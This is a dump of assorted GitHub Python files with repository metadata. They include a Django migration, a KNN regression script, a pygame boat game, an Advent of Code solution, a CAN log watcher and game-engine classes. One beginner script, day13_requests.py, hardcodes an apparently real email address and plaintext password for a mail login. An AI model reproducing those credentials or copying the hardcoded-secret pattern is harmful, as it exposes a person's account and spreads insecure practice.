blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
202dbc968ef28ea1d20e905728187462e2dadfd8 | a4025bc9e38dfaa86aaae1aa62bcc378cb6af4fc | /api_server/dataset/migrations/0001_initial.py | 2e33ebbd63ceb79edba5ae131d9b51caf67a3466 | [] | no_license | Nishant23/be-hiring-challenge | cae1c8744ca92d04293f2fe5b0d3d92d1d15535d | ddd19ba5a8b0fd43694d23e99d8e6c2a90734f14 | refs/heads/master | 2020-12-10T10:39:34.662073 | 2020-01-14T10:42:08 | 2020-01-14T10:42:08 | 233,569,972 | 0 | 0 | null | 2020-01-13T10:30:31 | 2020-01-13T10:30:30 | null | UTF-8 | Python | false | false | 569 | py | # Generated by Django 2.2.5 on 2020-01-13 12:20
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Dataset',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('file_blob', models.FileField(upload_to='dataset')),
('timestamp', models.DateTimeField(auto_now_add=True)),
],
),
]
| [
"nishant.suman@noodle.ai"
] | nishant.suman@noodle.ai |
52fdd7fc858104b5e5df2e99b048f1ed28c76a75 | 57ca0b702798ad4943299624621a467284d03d38 | /pyreadline/py3k_compat.py | 999f68b568700000b366049df4a8e918b8fd588f | [] | no_license | turky/pyreadline | 4f1a65b9ee6ff16e7e207fae9ab026a14df2662e | 6db93d93590d79d2d5f7117e41fb0197b2b5027e | refs/heads/master | 2022-01-13T01:42:59.596905 | 2021-12-28T06:34:08 | 2021-12-28T06:34:08 | 173,076,909 | 1 | 0 | null | 2019-02-28T08:56:57 | 2019-02-28T08:56:56 | null | UTF-8 | Python | false | false | 715 | py | from __future__ import print_function, unicode_literals, absolute_import
import sys
if sys.version_info[0] >= 3:
if sys.version_info[1] < 2:
import collections
PY3 = True
def callable(x):
return isinstance(x, collections.Callable)
def execfile(fname, glob, loc=None):
loc = loc if (loc is not None) else glob
with open(fname) as fil:
txt = fil.read()
exec(compile(txt, fname, 'exec'), glob, loc)
unicode = str
bytes = bytes
from io import StringIO
else:
PY3 = False
callable = callable
execfile = execfile
bytes = str
unicode = unicode
from StringIO import StringIO
| [
"akihiro.takizawa@gmail.com"
] | akihiro.takizawa@gmail.com |
9dd7f7a3e5021a18db66b29b4317d249552753ba | 97b431c4557746baeca6b43a7bcd541fb21dbfc4 | /src/K最近邻算法_KNN回归/KNNRegression.py | 38c25cfcb621fe77531d9fa919143fafc3d923d4 | [] | no_license | ixuyang/Python- | 4a22998922f624c472a9d3a8f186531d2a2b8b80 | ce018b20efcff53b04a8132135f937227d272f26 | refs/heads/master | 2020-04-08T20:04:42.453808 | 2018-12-29T09:43:42 | 2018-12-29T09:43:42 | 159,683,215 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,351 | py | '''
Created on 2018年12月3日
@author: gy
'''
import numpy as np
import pandas as pd
from Tools.scripts.dutree import display
data = pd.read_csv(r"iris.csv")
# 删除不需要的Id与Species列(特征),因为现在进行回归预测,通过花的前三个属性,预测第四个,类别信息就没有用处了。
data.drop(["Id","Species"],axis=1,inplace=True)
print(data)
#删除重复的记录
data.drop_duplicates(inplace=True)
class KNN:
"""使用python实现k近邻算法。(回归预测)
该算法用于回归预测,根据前3个特征属性,寻找最近的k个邻居,然后再根据k个邻居的第4个特征属性
,去预测当前样本的第4个特征值。
"""
def __init__(self,k):
"""初始化方法
Parameters
-----
k:int
邻居的个数。
"""
self.k = k
def fit(self,X,y):
"""训练方法。
Parameters
-----
X:类数组类型(特征矩阵)。形状为[样本数量,特征数量],形状类似二位数组或者矩阵
待训练的样本特征(属性)
y:类数组类型(目标标签)。形状为[样本数量]
每个样本的目标值(标签)ps:这个地方将会对应第四个属性值,不需要死板的理解为只是花的类别,还有可能是花额的宽度等
"""
# 注意,将X与y转化成ndarray数组的形式,方便统一进行操作。
self.X = np.asarray(X)
self.y = np.asarray(y)
def predict(self,X):
"""根据参数传递的X,对样本数据进行预测。
Parameters
-----
X:类数组类型。形状为[样本数量,特征数量]
待测试的样本特征(属性)
Returns
-----
result:数组类型。
预测的结果值
"""
# 转换成数组类型
X = np.asarray(X)
# 保存预测的结果值。
result = []
for x in X:
# 计算距离。(计算与训练集中每个X的距离)
dis = np.sqrt(np.sum((x - self.X)**2,axis=1))
# 返回数组排序后,每个元素在原数组中(排序之前的数组)的索引。
index = dis.argsort()
# 取前k个距离最近的索引(在原数组中的索引)。
index = index[:self.k]
# 计算均值,然后加入到结果列表当中。
result.append(np.mean(self.y[index]))
return np.array(result)
def predictWithWeight(self,X):
"""根据参数传递的X,对样本数据进行预测。(考虑权重)
权重的计算方式:使用每个节点(邻居)距离的倒数 /所有节点距离倒数之和。
Parameters
-----
X:类数组类型。形状为[样本数量,特征数量]
待测试的样本特征(属性)
Returns
-----
result:数组类型。
预测的结果值
"""
# 转换成数组类型
X = np.asarray(X)
# 保存预测的结果值。
result = []
for x in X:
# 计算距离。(计算与训练集中每个X的距离)
dis = np.sqrt(np.sum((x - self.X)**2,axis=1))
# 返回数组排序后,每个元素在原数组中(排序之前的数组)的索引。
index = dis.argsort()
# 取前k个距离最近的索引(在原数组中的索引)。
index = index[:self.k]
# 所有邻居节点距离的倒数之和。[注意最后加上一个很小的值,避免除数(距离,如果重合可能为零)为零的情况]
s = np.sum(1 / (dis[index] + 0.001))
# 使用每个节点的倒数,然后除以倒数之和,得到权重。
weight = (1 / (dis[index] + 0.001)) / s
# 使用邻居节点的标签值乘以对应的权重,然后求和,得到最终的预测结果。
result.append(np.sum(self.y[index] * weight))
return np.array(result)
t = data.sample(len(data),random_state=0)
train_X = t.iloc[:120,:-1]
train_y = t.iloc[:120,-1]
test_X = t.iloc[120:,:-1]
test_y = t.iloc[120:,-1]
knn = KNN(k=3)
knn.fit(train_X,train_y)
result = knn.predict(test_X)
print(np.mean(np.sum((result - test_y) ** 2)))
# 这个地方对误差进行平方处理,避免正负误差抵消。
np.mean((result - test_y) ** 2)
# 显示测试结果误差
print(np.mean((result - test_y) ** 2))
# print(test_y.values)
result = knn.predictWithWeight(test_X)
# 显示带有权重后的测试结果误差。
print(np.mean((result - test_y) ** 2))
import matplotlib as mpl
import matplotlib.pyplot as plt
mpl.rcParams["font.family"] = "SimHei"
mpl.rcParams["axes.unicode_minus"] = False
plt.Figure(figsize=(10,10))
# 绘制预测值
plt.plot(result,"ro-",label="预测值")
# 绘制真实值
plt.plot(test_y.values,"go--",label="真实值")
plt.title("KNN连续值预测展示")
plt.xlabel("节点序号")
plt.ylabel("花瓣宽度")
plt.legend()
plt.show() | [
"ixuyang@foxmail.com"
] | ixuyang@foxmail.com |
ec268e7ba61c9681943d1bb3c906b441b4ed6595 | 0d4f0a71a640be6bc105792c32df22ee09c3a54c | /day13_requests.py | 9c5eecc58432e5ad8e6a697f0400ab592e16525b | [] | no_license | aibingbing/study-python-basic | 2f5caa07ae77b19252d7aac113bd8716aab13362 | 0a6bf533fd59f7151a7a5560436007b4844a270a | refs/heads/master | 2021-01-19T11:05:42.051536 | 2017-05-20T00:55:57 | 2017-05-20T00:55:57 | 87,928,591 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 483 | py | # !/usr/bin/env python
# -*- coding:utf-8 -*-
'''
study third party library:requests
'''
import requests
def main():
'''doc string
'''
r = requests.get(' https://exmail.qq.com/login', auth=('aibingbing@etutech.com', 'Etuabb2017'))
# print r.status_code
# print r.headers['content-type']
# print r.encoding
# print r.text
r = requests.get('http://www.betterbing.net')
print r.text
print r.encoding
if __name__ == '__main__':
main()
| [
"aibingbing1991@qq.com"
] | aibingbing1991@qq.com |
a4655c1b0f2237ee602dc8be26b27ae9f029790e | ff48e029c6f6ef945e1cc6e9e045685d86e7b4cf | /py/eg1.py | 00a79bce84fee527437d1887f0c7900333bf56ce | [] | no_license | SIDDHANTJOHARI/IOT | 715c89c4001b56c860909256a6b163c0c992394e | 40494d55cf47ec5c44057cd9a605bec3cf5305a5 | refs/heads/master | 2023-05-15T00:43:57.342510 | 2021-06-07T20:27:20 | 2021-06-07T20:27:20 | 367,887,796 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | import serial
import time
#serial ek package hai
# Serial ek class hai
# board ek pointer hai
board=serial.Serial(port="/dev/ttyUSB0",baudrate=9600)
time.sleep(4)
print(type(board))
board.close() | [
"root@cybertrons.cybertrons.in"
] | root@cybertrons.cybertrons.in |
8b17a4a09e0ef2bde705a87d2c804051ad8c5844 | 9b2f78185c7e9ccafc41e6147ef31fb23bc50182 | /Exercícios em Python/PythonExercícios/ex022.py | 3d18077878245e14905163087ad46cf7da3386a1 | [
"MIT"
] | permissive | HenriquedaSilvaCardoso/Exercicios-CursoemVideo-Python | 54fc879cf4325666bee1b3c1b029a8156530a30b | b1ad377657757b77dcd36eb36dfa6f156afe7e28 | refs/heads/main | 2023-06-03T01:21:04.450274 | 2021-06-21T13:22:40 | 2021-06-21T13:22:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | from random import randint
nome = input('Digite seu nome completo: ').strip()
print(f'Seu nome com as letras todas maiúsculas é \033[{randint(30, 37)}m{nome.upper()}\033[m')
print(f'Seu nome com as letras todas minúsculas é \033[{randint(30, 37)}m{nome.lower()}\033[m')
Div= nome.split()
print(f'Desconsiderando espaços seu nome possui \033[{randint(30, 37)}m{len(nome.replace(" ", ""))}\033[m letras')
print(f'Seu primeiro nome é {Div[0]} e possui \033[{randint(30, 37)}m{len(Div[0])}\033[m letras')
| [
"henriquedasilvacardoso00@gmail.com"
] | henriquedasilvacardoso00@gmail.com |
9b0c90269a0a5ff5f89369b8ca2e2d59d97665fe | 7c0acdc46cfce5dc116d394f6990ee5ab1c0fa0c | /venv/lib/python3.7/site-packages/buildsystem/setup.py | 3e4ac13dece62dd1ea8f1f0ac6fe7d644541d600 | [
"MIT"
] | permissive | Vatansever27/ExchangeCode | 84fb4a02371fdda7cd94d00971be76bcd1068be0 | ab284653a337937139a9a28c036efe701fb376c7 | refs/heads/master | 2020-04-07T16:38:59.819929 | 2018-11-21T12:18:30 | 2018-11-21T12:18:30 | 158,537,067 | 0 | 0 | null | 2018-11-21T12:18:31 | 2018-11-21T11:22:14 | null | UTF-8 | Python | false | false | 1,093 | py | from .base import BaseBuilder, task
import os
class SetupBuilder(BaseBuilder):
setupdir = '.'
setupscript = None
product_title = 'Setup'
@task('compile_setup')
def do_compile_setup(self):
'''Compiles the Inno Setup Script `setupscript` into directory `setupdir` if `setupscript` is specified and exists.
`setupscript` has to be defined based on the directory `setupdir`.'''
if self.setupscript and os.path.exists(os.path.join(self.setupdir, self.setupscript)):
d = os.getcwd()
os.chdir(self.setupdir)
# write version information into git.txt
with open('git.txt', 'w') as f:
f.write(self.version)
# run setup
self.run([r'C:\Program Files (x86)\Inno Setup 5\ISCC.exe', self.setupscript])
# remove git.txt
os.remove('git.txt')
os.chdir(d)
else:
raise Exception('Setup script does not exist: %s' % os.path.join(self.setupdir, self.setupscript))
| [
"doguhan@puentedev.io"
] | doguhan@puentedev.io |
e60f604d33322f16b55ffc642e52a6ffadcea543 | 80460cb811f514771188e7560711944fcf6c9b87 | /codes/systematics/elias.py | ed7c80fbe97f1cd15828cffdee99cc0ecdd89438 | [] | no_license | semeneleven/XTest | 2a5d3647f83959aae42938c07590806ce1b48ce8 | df7faf679698a23efc5079eb1b3308e226bffe80 | refs/heads/master | 2020-04-14T23:55:19.535650 | 2019-01-06T12:07:22 | 2019-01-06T12:07:22 | 164,221,429 | 0 | 0 | null | 2019-01-06T12:12:43 | 2019-01-05T14:20:38 | HTML | UTF-8 | Python | false | false | 2,175 | py | import random
def assert_code(data, answ):
data=data['message']
print(answ)
for i in range(len(data)):
sum = 0
for j in range(len(data[i])):
sum ^= data[i][j]
if not sum == int(answ[0][i]):
return False
for i in range(len(data)):
sum = 0
for j in range(len(data[i])):
sum ^= data[j][i]
if not sum == int(answ[1][i]):
return False
return True
def assert_decode(data, answ):
for i in range(len(answ)):
sum = 0
for j in range(len(answ[i])):
sum ^= int(answ[i][j])
if not sum == data['vertical'][i]:
return False
for i in range(len(answ)):
sum = 0
for j in range(len(answ[i])):
sum ^= int(answ[j][i])
if not sum == data['horizontal'][i]:
return False
return True
def generate_for_encode():
data = list()
for i in range(5):
data.append(list())
for j in range(5):
data[i].append(random.randint(0, 1))
return {'message': data}
def generate_for_decode():
answ = generate_for_encode()['message']
data=[[],[]]
for i in range(len(answ)):
sum = 0
for j in range(len(answ[i])):
sum ^= answ[i][j]
data[0].append(sum)
for i in range(len(answ)):
sum = 0
for j in range(len(answ[i])):
sum ^= answ[j][i]
data[1].append(sum)
err_x = random.randint(0, 4)
err_y = random.randint(0, 4)
answ[err_x][err_y] ^= 1
return {'horizontal': data[1], 'vertical': data[0], 'message': answ}
def get_details():
return {'view_type': 'standard',
'exam_tasks': 2}
def get_name():
return 'Элиаса'
#test
# print(assert_code([[1, 0, 1, 0, 1], [0, 1, 1, 0, 1], [0, 0, 1, 1, 1], [0, 1, 0, 0, 1], [1, 0, 1, 0, 1]],
# [[1, 1, 1, 0, 1], [0, 0, 0, 1, 1]]))
# print(assert_decode([[0, 0, 1, 0, 0], [0, 0, 0, 0, 1]],
# [[0, 0, 0, 0, 0], [1, 0, 0, 1, 0], [1, 0, 0, 0, 0], [1, 1, 1, 1, 0], [1, 1, 1, 0, 1]]))
# print(generate_for_encode())
# print(generate_for_decode())
| [
"halit.sergey@gmail.com"
] | halit.sergey@gmail.com |
049b08abf6cefe902dfc27a837156c765e69f54a | 2760494bc6ea8628a2c401bd4b55dd8cc5536a97 | /2020/13/13.py | 0495a6923afd6a0f44104d86c9a9014edf143878 | [] | no_license | lysrt/aoc | e38bb3db9d14b410549b2a1b24337b9e608940e2 | 2e7578f458721206e798793fbc9cf74701ae0033 | refs/heads/master | 2023-02-02T16:39:34.349900 | 2020-12-19T13:33:53 | 2020-12-19T13:33:53 | 116,025,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,108 | py |
def part1(earliest, buses):
int_buses = [int(b) for b in buses.split(',') if b != 'x']
i = earliest
candidate = 0
while candidate == 0:
for b in int_buses:
if i % b == 0:
candidate = b
break
i += 1
return (i-earliest) * candidate
def part2(buses):
indices = {}
for i, b in enumerate(buses):
if b == 'x':
continue
number = int(b)
indices[number] = i
no_x = [int(b) for b in buses if b != 'x']
prev = no_x[0]
factor = prev
for n in no_x[1:]:
step = 0
while True:
x1 = prev + step
x2 = x1 + indices[n]
if x2 % n == 0:
# print("Found:", x1)
prev = x1
factor *= n
break
step += factor
return x1
def main():
with open('input', 'r') as f:
earliest, buses = [l.strip() for l in f.readlines()]
print("Part 1:", part1(int(earliest), buses)) # 410
print("Part 2:", part2(buses.split(','))) # 600691418730595
main() | [
"lucas.sartore@gmail.com"
] | lucas.sartore@gmail.com |
9c03fc0e8ffe9520a475cd645c0f19eb15947fc4 | f4c1f5c895cd27814b045e03c5b82508d3178d42 | /src/__init__.py | be11c935d3245ffdf698eabcc0ec0cc4d954e71f | [] | no_license | Jeffkang-94/Mixmatch-pytorch-SSL | d20856ad3b4b92b14f32f2e0233b179bebb899dc | 05f261bdba709aafe85d32c2a6664a3f2c5de935 | refs/heads/master | 2023-07-14T12:35:25.467721 | 2021-08-10T13:17:10 | 2021-08-10T13:17:10 | 382,040,428 | 21 | 2 | null | null | null | null | UTF-8 | Python | false | false | 82 | py | from .train import Trainer
from .eval import Evaluator
from .base import BaseModel | [
"mingu.kang@kaist.ac.kr"
] | mingu.kang@kaist.ac.kr |
7da211d13669c53ae3a7af15dc4be7c7dde9b140 | f40ec7443642620beb159e9ac88cbf4e27a2d581 | /oil_db/oil_database/models/noaa_fm/kvis.py | f7612344fcb2677439e0fd239c9894735b1ecde1 | [] | no_license | JamesMakela/OilDatabase | b2675e9a9dd0c3eb530ebb1866fa8d5893d62a11 | 9bee88fc7f2bb082931ae46cf7a7da9b77f69dbf | refs/heads/master | 2021-04-28T03:31:40.414916 | 2019-04-25T14:23:32 | 2019-04-25T14:23:32 | 122,141,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 764 | py | #
# PyMODM Model class definitions for embedded content in our oil records
#
from pymodm import EmbeddedMongoModel
from pymodm.fields import FloatField
class NoaaFmKVis(EmbeddedMongoModel):
m_2_s = FloatField()
ref_temp_k = FloatField()
weathering = FloatField(default=0.0)
def __init__(self, **kwargs):
for a, _v in kwargs.items():
if (a not in self.__class__.__dict__):
del kwargs[a]
if 'weathering' not in kwargs or kwargs['weathering'] is None:
kwargs['weathering'] = 0.0
super(NoaaFmKVis, self).__init__(**kwargs)
def __repr__(self):
return ('<NoaaFmKVis({0.m_2_s} m^2/s at {0.ref_temp_k}K, '
'w={0.weathering})>'
.format(self))
| [
"james.makela@gmail.com"
] | james.makela@gmail.com |
1e1d357c40ec4cac5d459291702242e927df47b5 | ad4acddc11c012d90759fcba639751beb495beb5 | /logDirNotify.py | c0c46d496e68fb36009cd0be9ca29041ece281f1 | [] | no_license | johnmacmillan96/CAN | 15b720c1f7916a7a78d35dd76a71fc8870887f43 | 8cb8e2ec7e1082fbf68a8bb653f95f5121e05c41 | refs/heads/master | 2021-01-02T08:41:10.087584 | 2017-08-30T22:53:55 | 2017-08-30T22:53:55 | 99,042,066 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 869 | py | import pyinotify
import subprocess
from processCanLog import *
from canmsgs import *
wm = pyinotify.WatchManager()
moveMask = pyinotify.IN_MOVED_TO
class EventHandler(pyinotify.ProcessEvent):
# This method processes the candump log file
def process_IN_MOVED_TO(self, event):
print('Translating: ' + event.pathname + '\n')
try:
translateCAN(event.pathname)
print('Finished translating ' + event.pathname + '\n')
except NoTranslationData as error:
print(error.args)
# creates a new handler object
handler = EventHandler()
# creates the notifier
notifier = pyinotify.Notifier(wm, handler)
# adds the directory to watch
# replace this directory with the directory that the can logs are saved to
wm.add_watch('/home/pi/Documents/CAN/log/', moveMask)
notifier.loop()
| [
"jmac854@uw.edu"
] | jmac854@uw.edu |
2b8b21a00b1cf647bd82299135240bcdd9948302 | 4df671749069fd70a04f8c064548ff1f61761d37 | /boatgame.py | 379c0af0d10a3dcab1ef1a4e5cd26e93f5aee0bb | [] | no_license | naburnham/cannonballer | 302fc9d7728ac5d2906d39619c604c3d05ee0cc8 | 8be53f060e527cf71600907ae09ff347ae2ac156 | refs/heads/master | 2021-01-21T21:15:05.967561 | 2017-06-19T16:00:39 | 2017-06-19T16:00:39 | 94,795,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,089 | py | import pygame
import random
import time
pygame.init()
# Pre-made Colors
black = (0, 0, 0)
white = (255, 255, 255)
red = (255, 0, 0)
dark_red = (200, 0, 0)
green = (0, 255, 0)
dark_green = (0, 200, 0)
blue = (0, 0, 255)
light_blue = (175, 225, 255)
# Pre-defined Fonts
large_text = pygame.font.SysFont('arialblack', 100)
medium_text = pygame.font.SysFont('arial', 50)
small_text = pygame.font.SysFont('arial', 25)
# Game Display Settings
display_width = 1200
display_height = 675
game_display = pygame.display.set_mode((display_width, display_height))
pygame.display.set_caption('Cannonballer')
clock = pygame.time.Clock()
# Images
boat_img = pygame.image.load('playerboat.png')
enemy_boat_img = pygame.image.load('enemyboat.png')
cannonball_img = pygame.image.load('cannonball.png')
# Various Game Variables
level = 0
count = 0
timer = 1000
level_count = 0
start_boats = 3
points_per_boat = 250
def level_and_score(p_level, score):
""" Displays the players level+1 and Score in the upper left hand corner of the screen """
font = small_text
text = font.render('Level: {}, Score: {}'.format(str(p_level+1), str(score)), True, black)
game_display.blit(text, (5, 5))
def button(message, x, y, width, height, inactive_color, hover_color, command=None):
""" Make an interactive button with text """
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
if x + width > mouse[0] > x and y + height > mouse[1] > y:
pygame.draw.rect(game_display, hover_color, (x, y, width, height))
if click[0] == 1 and command is not None:
ready_level()
command()
else:
pygame.draw.rect(game_display, inactive_color, (x, y, width, height))
text_surface, text_rect = text_objects(message, small_text)
text_rect.center = (x + (width / 2), y + (height / 2))
game_display.blit(text_surface, text_rect)
def exit_game():
""" Exits the Game """
pygame.quit()
quit()
def start_screen():
""" The initial and between level landing screen """
global level
global count
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
exit_game()
game_display.fill(white)
start_screen_title('Cannonballer')
button('Go!', 350, 450, 100, 50, dark_green, green, game_loop)
button('Quit', 750, 450, 100, 50, dark_red, red, exit_game)
instructions('W: Fire Cannonball A: Move Left D: Move Right')
if level == 0 and count == 0:
pass
else:
level_and_score(level, count)
pygame.display.update()
clock.tick(60)
def text_objects(message, font):
text_surface = font.render(message, True, black)
return text_surface, text_surface.get_rect()
def instructions(message):
""" Writes a medium message near top of screen, centered """
text_surface, text_rect = text_objects(message, medium_text)
text_rect.center = ((display_width/2), 115)
game_display.blit(text_surface, text_rect)
def start_screen_title(message):
""" Displays game title on the start screen """
text_surface, text_rect = text_objects(message, large_text)
text_rect.center = ((display_width / 2), (display_height / 2))
game_display.blit(text_surface, text_rect)
def message_display(message):
""" Writes large message in center of screen """
text_surface, text_rect = text_objects(message, large_text)
text_rect.center = ((display_width/2), (display_height/2))
game_display.blit(text_surface, text_rect)
pygame.display.update()
class Cannonball:
def __init__(self, cannonball_image, x, y, width=16, height=16):
self.cannonball_image = cannonball_image
self.width = width
self.height = height
self.y = y
self.x = x
def cannonball_display(self):
game_display.blit(self.cannonball_image, (self.x, self.y))
def update(self, y_change):
""" Updates position of cannonball, then checks to see if it hits a boat.
If hit boat, destroy boat. If boat player: you lose, else: Score +points.
If position is off screen, destroys self.
"""
global level
global count
global level_count
global points_per_boat
self.y += y_change
if player.y + player.height > self.y > player.y - int(self.height/2):
if player.x < self.x < player.x + player.width or player.x < self.x + self.width < player.x + player.width:
message_display('You Were Hit!')
reset_variables()
time.sleep(1)
start_screen()
else:
for boat in range(len(enemy_boats)-1, -1, -1):
if enemy_boats[boat].y + enemy_boats[boat].height > self.y + self.height:
if enemy_boats[boat].x < self.x < enemy_boats[boat].x + enemy_boats[boat].width or \
enemy_boats[boat].x < self.x + self.width < enemy_boats[boat].x + \
enemy_boats[boat].width:
del enemy_boats[boat]
count += points_per_boat
if self.y > display_height:
del enemy_cannonballs[0]
if self.y < 0:
del player_cannonballs[0]
class Boat:
def __init__(self, boat_image, x, y, width=32, height=64):
self.boat_image = boat_image
self.width = width
self.height = height
self.x = x
self.y = y
def boat_display(self):
game_display.blit(self.boat_image, (self.x, self.y))
def boat_update(self, x_change):
self.x += x_change
player_cannonballs = []
enemy_cannonballs = []
enemy_boats = []
def make_boats(number):
global enemy_boats
for i in range(number):
enemy_boats.append(Boat(enemy_boat_img, ((((display_width/number)*i)+(display_width/number)/number)+16), 36))
def reset_variables():
global level
global count
global timer
level = 0
count = 0
timer = 1000
def ready_level():
global enemy_cannonballs
global player_cannonballs
global level_count
global enemy_boats
global timer
global start_boats
enemy_cannonballs = []
player_cannonballs = []
enemy_boats = []
level_count = 0
if level > 0 and level % 4 == 0 and timer > 500:
timer -= 100
if level == 0:
make_boats(start_boats)
else:
make_boats(start_boats + level)
def check_collisions():
global level
global count
global level_count
if player.x > display_width-player.width or player.x < 0:
message_display('You crashed!')
time.sleep(1)
reset_variables()
level_count = 0
start_screen()
def fire(boat, i):
if boat == player:
cannonball = Cannonball(cannonball_img, player.x+8, player.y-8)
player_cannonballs.append(cannonball)
elif boat == enemy_boats[i]:
cannonball = Cannonball(cannonball_img, enemy_boats[i].x+8, enemy_boats[i].y+enemy_boats[i].height+16)
enemy_cannonballs.append(cannonball)
def game_loop():
global player
global level
global count
global timer
enemy_event = pygame.NUMEVENTS - 1
pygame.time.set_timer(enemy_event, timer)
player_boat_x = (display_width * 0.5) - 16
player_boat_y = display_height * 0.8
player = Boat(boat_img, player_boat_x, player_boat_y)
x_change = 0
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
exit_game()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_a:
x_change = -5
elif event.key == pygame.K_d:
x_change = 5
elif event.key == pygame.K_w:
fire(player, 0)
if event.type == pygame.KEYUP:
if event.key == pygame.K_a or event.key == pygame.K_d:
x_change = 0
if event.type == enemy_event:
if enemy_boats:
boat = random.randrange(0, len(enemy_boats))
fire(enemy_boats[boat], boat)
player_boat_x += x_change
check_collisions()
game_display.fill(light_blue)
for cannonball in player_cannonballs:
cannonball.cannonball_display()
cannonball.update(-5)
for cannonball in enemy_cannonballs:
cannonball.cannonball_display()
cannonball.update(5)
for boat in enemy_boats:
boat.boat_display()
if len(enemy_boats) == 0:
message_display('You beat Level {}!'.format(str(level+1)))
time.sleep(1)
level += 1
ready_level()
start_screen()
level_and_score(level, count)
player.boat_update(x_change)
player.boat_display()
pygame.display.update()
clock.tick(60)
if __name__ == '__main__':
start_screen()
| [
"naburnham@zoho.com"
] | naburnham@zoho.com |
52fd9eee2ea92280eef3cda43ec700098fc1ddbe | 0145dbe97f3d34017d996430006accc04ed1929e | /parse_apache_configs/test/test_file_diff.py | 54b48976c23f7fb18cdba9e24f22d72dc846ef0f | [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | daladim/parse_apache_configs | c2527585ef97dafef5ee9f9f88ede062b2be648f | 5f585c099095176ae4708c65593bef315d930033 | refs/heads/master | 2022-05-30T17:01:33.191882 | 2020-05-05T06:34:54 | 2020-05-05T06:34:54 | 258,106,644 | 0 | 0 | Apache-2.0 | 2020-04-23T05:47:42 | 2020-04-23T05:47:41 | null | UTF-8 | Python | false | false | 1,638 | py | import difflib
from parse_apache_configs import parse_config
import unittest
from pprint import pprint
from os.path import isfile,join
from os import listdir
class testFileDiff(unittest.TestCase):
def test_file_diff(self):
"""
This method takes the output of get_apache_config, and diffs
it against the orignal file, ignoring whitespace. This will test
to see how close to the original file the output of get_apache_config
is.
"""
test_files = [ f for f in listdir("./test_conf_files") if isfile(join("./test_conf_files", f)) ]
for file_name in test_files:
file_path = "./test_conf_files/" + file_name
with open(file_path, "r") as apache_config:
file_string = apache_config.read()
pac = parse_config.ParseApacheConfig(file_path)
conf_list = pac.parse_config()
conf_string = pac.get_apache_config(conf_list)
conf_string = conf_string.replace(" ", "")
conf_string = conf_string.replace("\t", "")
file_string = file_string.replace(" ", "")
file_string = file_string.replace("\t", "")
s = difflib.SequenceMatcher(None, conf_string, file_string)
self.assertTrue(s.real_quick_ratio() == 1.0)
#print s.real_quick_ratio()
def test_file_diff_after_add(self):
"""
This method will add a few directives to the apache config
then to a diff on it against the original file. The diff
should return a ratio less than 1.
"""
pass
| [
"miguel.cantu@rackspace.com"
] | miguel.cantu@rackspace.com |
99f0114229968dc89da64649302a272cb8b61dd7 | 19308c971669b903fd1ee9862948e482ab37ce56 | /open_window.py | 74ac07da4a769f11e7c9ef3afdd4005bad3c1154 | [
"MIT"
] | permissive | crazcalm/learn_tkinter_canvas | 9634716275061d56282c1062a9d58cdac5761869 | b798a6f2217a478e9222bb6eaa2afec3d28a2758 | refs/heads/master | 2021-01-03T04:33:25.134059 | 2020-03-02T01:07:28 | 2020-03-02T01:07:28 | 239,924,031 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 57 | py | import tkinter as tk
window = tk.Tk()
window.mainloop() | [
"crazcalm@gmail.com"
] | crazcalm@gmail.com |
12ffc04da6d5d1f0f1212995f33e58915d501bc0 | a964f0f3f93a84d5195042d3c1bb2288e8b62161 | /muddery/server/typeclasses/locked_exit.py | 0451335dae27a4647d7d453f79f9d35569d9f04e | [
"BSD-3-Clause"
] | permissive | nobodxbodon/muddery | 474433791b75d2f2130e6b758fb3126e2d56230b | 4b4c6c0dc5cc237a5df012a05ed260fad1a793a7 | refs/heads/master | 2023-06-19T19:28:39.252340 | 2021-07-14T15:07:47 | 2021-07-14T15:07:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,770 | py | """
Exits
Exits are connectors between Rooms. An exit always has a destination property
set and has a single command defined on itself with the same name as its key,
for allowing Characters to traverse the exit to its destination.
"""
from muddery.server.statements.statement_handler import STATEMENT_HANDLER
from muddery.server.utils.localized_strings_handler import _
from muddery.server.mappings.typeclass_set import TYPECLASS
class MudderyLockedExit(TYPECLASS("EXIT")):
"""
Characters must unlock these exits to pass it.
The view and commands of locked exits are different from unlocked exits.
"""
typeclass_key = "LOCKED_EXIT"
typeclass_name = _("Locked Exit", "typeclasses")
model_name = "exit_locks"
def after_data_loaded(self):
"""
Set data_info to the object."
"""
super(MudderyLockedExit, self).after_data_loaded()
self.unlock_condition = getattr(self.system, "unlock_condition", "")
self.unlock_verb = getattr(self.system, "unlock_verb", "")
self.locked_desc = getattr(self.system, "locked_desc", "")
